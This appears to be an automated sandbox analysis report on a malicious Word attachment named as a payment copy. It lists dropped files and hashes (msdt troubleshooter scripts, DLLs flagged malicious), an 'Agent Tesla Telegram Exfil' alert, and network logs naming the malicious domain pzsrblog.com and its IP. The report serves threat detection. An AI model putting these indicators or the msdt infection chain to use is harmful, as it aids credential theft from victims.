                                                                                                                                      Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..
                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):66560
                                                                                                                                      Entropy (8bit):6.926109943059805
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                      MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                      SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                      SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                      SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):50242
                                                                                                                                      Entropy (8bit):4.932919499511673
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                      MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                      SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                      SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                      SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp
                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16946
                                                                                                                                      Entropy (8bit):4.860026903688885
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                      MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                      SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                      SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                      SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ
                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):453
                                                                                                                                      Entropy (8bit):4.983419443697541
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                      MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                      SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                      SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                      SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....
                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6650
                                                                                                                                      Entropy (8bit):3.6751460885012333
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                      MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                      SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                      SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                      SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.
                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10752
                                                                                                                                      Entropy (8bit):3.517898352371806
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                      MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                      SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                      SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                      SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):48956
                                                                                                                                      Entropy (8bit):5.103589775370961
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                      MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                      SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                      SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                      SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="
                                                                                                                                      File type:Microsoft Word 2007+
                                                                                                                                      Entropy (8bit):7.994989792624349
                                                                                                                                      TrID:
                                                                                                                                      • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                      • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                      • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                      File name:Payment copy_2911022.docx.doc
                                                                                                                                      File size:110504
                                                                                                                                      MD5:cd3dbd5f1d468da826581361b619b393
                                                                                                                                      SHA1:9d5fc2d99aec7c8c18d8af7267b4a31801fda770
                                                                                                                                      SHA256:1c6189f068ee3870e1d41511bd55c02cef9d98a816a963a26f95ff0b6becea1f
                                                                                                                                      SHA512:91ae486d3b8a687ce2e994ee179161896f71f6c0e973b1ebd52ff856753ccc8cb5b7e0c7890c87158a558e74e061281d4bf6dd37e9941b3593a3ccbd77f71bdf
                                                                                                                                      SSDEEP:1536:oI2CqvURAICmRMMlzJEGEBwNQFgbLndOxR8qn7CJcsqKqLzDOfFGpt+rlTuq:vTADANPLNQUkRhnm9qKqqgt+r0q
                                                                                                                                      TLSH:56B3021A16401374FBCF83FCF954890FD85B2974EB05BE441E9CEEE8A4AD3411D2D669
                                                                                                                                      File Content Preview:PK........h..U...p`...T.......[Content_Types].xmlUT...H..cH..cH..c.T.N.0..#....U...B.i.,G.D......o.....7%B(4.m/..y.X..O.Zek.AZS.Q1$..n.4uI......BdF0e..d..L'.W...A..mBI.1.{J._.f....V*.5.x.5u......pxK.5.L.c. ..#Tl.b....&...H....WI.sJr..N.F.r....2.......@h.C
                                                                                                                                      Icon Hash:74f4c4c6c1cac4d8
                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                      192.168.2.5149.154.167.220497254432851779 12/20/22-14:16:47.588535TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49725443192.168.2.5149.154.167.220
                                                                                                                                      192.168.2.5149.154.167.220497284432851779 12/20/22-14:16:51.990077TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49728443192.168.2.5149.154.167.220
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Dec 20, 2022 14:14:23.902723074 CET49701443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:23.902792931 CET44349701118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:23.902899027 CET49701443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:23.903954983 CET49701443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:23.903983116 CET44349701118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:24.497242928 CET44349701118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:24.497373104 CET49701443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:24.502197027 CET49701443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:24.502238035 CET44349701118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:24.502774000 CET44349701118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:24.504811049 CET49701443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:24.504839897 CET44349701118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:25.061393023 CET44349701118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:25.061783075 CET49701443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:25.138766050 CET49702443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:25.138839960 CET44349702118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:25.138947964 CET49702443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:25.139244080 CET49702443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:25.139273882 CET44349702118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:25.759648085 CET44349702118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:25.760251045 CET49702443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:25.760283947 CET44349702118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:25.761534929 CET49702443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:25.761550903 CET44349702118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:26.362339973 CET44349702118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:26.362500906 CET44349702118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:26.362571001 CET49702443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:26.362623930 CET44349702118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:26.362651110 CET49702443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:26.362651110 CET49702443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:26.362664938 CET44349702118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:26.362673998 CET44349702118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:29.411562920 CET49703443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:29.411624908 CET44349703118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:29.411721945 CET49703443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:29.412061930 CET49703443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:29.412079096 CET44349703118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:29.992482901 CET44349703118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:29.993061066 CET49703443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:29.993089914 CET44349703118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:29.994359970 CET49703443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:29.994369984 CET44349703118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:30.570672989 CET44349703118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:30.571005106 CET49703443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:30.639374018 CET49704443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:30.639475107 CET44349704118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:30.639561892 CET49704443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:30.640628099 CET49704443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:30.640664101 CET44349704118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:31.260385990 CET44349704118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:31.260526896 CET49704443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:31.282834053 CET49704443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:31.282875061 CET44349704118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:31.283493996 CET44349704118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:31.283627987 CET49704443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:31.284497023 CET49704443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:31.284504890 CET44349704118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:31.872313976 CET44349704118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:31.872378111 CET44349704118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:31.872479916 CET44349704118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:31.872508049 CET49704443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:31.872541904 CET49704443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:31.881751060 CET49704443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:31.881778002 CET44349704118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:31.952964067 CET49705443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:31.953025103 CET44349705118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:31.953118086 CET49705443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:31.953443050 CET49705443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:31.953459978 CET44349705118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:32.528594017 CET44349705118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:32.528748989 CET49705443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:32.531790018 CET49705443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:32.531805038 CET44349705118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:32.538316965 CET49705443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:32.538341045 CET44349705118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:33.099616051 CET44349705118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:33.099706888 CET44349705118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:33.099796057 CET49705443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:33.100476980 CET49705443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:33.100476980 CET49705443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:33.102312088 CET49705443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:33.299954891 CET49706443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:33.300024986 CET44349706118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:33.300117016 CET49706443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:33.300584078 CET49706443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:33.300625086 CET44349706118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:33.883405924 CET44349706118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:33.887769938 CET49706443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:33.887825966 CET44349706118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:33.889586926 CET49706443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:33.889611959 CET44349706118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:34.463419914 CET44349706118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:34.501749039 CET49706443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:34.536781073 CET49707443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:34.536851883 CET44349707118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:34.536952019 CET49707443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:34.537168026 CET49707443192.168.2.5118.27.125.229
                                                                                                                                      Dec 20, 2022 14:14:34.537183046 CET44349707118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:35.120482922 CET44349707118.27.125.229192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:35.164689064 CET49707443192.168.2.5118.27.125.229
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Dec 20, 2022 14:14:23.832971096 CET5144153192.168.2.58.8.8.8
                                                                                                                                      Dec 20, 2022 14:14:23.852786064 CET53514418.8.8.8192.168.2.5
                                                                                                                                      Dec 20, 2022 14:14:30.619604111 CET4972453192.168.2.58.8.8.8
                                                                                                                                      Dec 20, 2022 14:14:30.637578964 CET53497248.8.8.8192.168.2.5
                                                                                                                                      Dec 20, 2022 14:15:35.389008045 CET5503953192.168.2.58.8.8.8
                                                                                                                                      Dec 20, 2022 14:15:35.406678915 CET53550398.8.8.8192.168.2.5
                                                                                                                                      Dec 20, 2022 14:16:28.995455027 CET6265953192.168.2.58.8.8.8
                                                                                                                                      Dec 20, 2022 14:16:29.014905930 CET53626598.8.8.8192.168.2.5
                                                                                                                                      Dec 20, 2022 14:16:29.046013117 CET5858153192.168.2.58.8.8.8
                                                                                                                                      Dec 20, 2022 14:16:29.065974951 CET53585818.8.8.8192.168.2.5
                                                                                                                                      Dec 20, 2022 14:16:47.428745031 CET5626353192.168.2.58.8.8.8
                                                                                                                                      Dec 20, 2022 14:16:47.446058989 CET53562638.8.8.8192.168.2.5
                                                                                                                                      Dec 20, 2022 14:16:50.307109118 CET5668753192.168.2.58.8.8.8
                                                                                                                                      Dec 20, 2022 14:16:50.326646090 CET53566878.8.8.8192.168.2.5
                                                                                                                                      Dec 20, 2022 14:16:50.329607010 CET6441953192.168.2.58.8.8.8
                                                                                                                                      Dec 20, 2022 14:16:50.346931934 CET53644198.8.8.8192.168.2.5
                                                                                                                                      Dec 20, 2022 14:16:51.833882093 CET5268853192.168.2.58.8.8.8
                                                                                                                                      Dec 20, 2022 14:16:51.851346016 CET53526888.8.8.8192.168.2.5
                                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                                      Dec 20, 2022 14:14:21.227132082 CET192.168.2.58.8.8.8d07a(Port unreachable)Destination Unreachable
                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Dec 20, 2022 14:14:23.832971096 CET192.168.2.58.8.8.80x9fcStandard query (0)pzsrblog.comA (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:14:30.619604111 CET192.168.2.58.8.8.80x3efdStandard query (0)pzsrblog.comA (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:15:35.389008045 CET192.168.2.58.8.8.80xd4eaStandard query (0)pzsrblog.comA (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:28.995455027 CET192.168.2.58.8.8.80xd9e5Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:29.046013117 CET192.168.2.58.8.8.80xb93aStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:47.428745031 CET192.168.2.58.8.8.80x198Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:50.307109118 CET192.168.2.58.8.8.80x2526Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:50.329607010 CET192.168.2.58.8.8.80xf341Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                      Dec 20, 2022 14:16:51.833882093 CET192.168.2.58.8.8.80xa1a0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Dec 20, 2022 14:14:23.852786064 CET8.8.8.8192.168.2.50x9fcNo error (0)pzsrblog.com118.27.125.229A (IP address)IN (0x0001)false
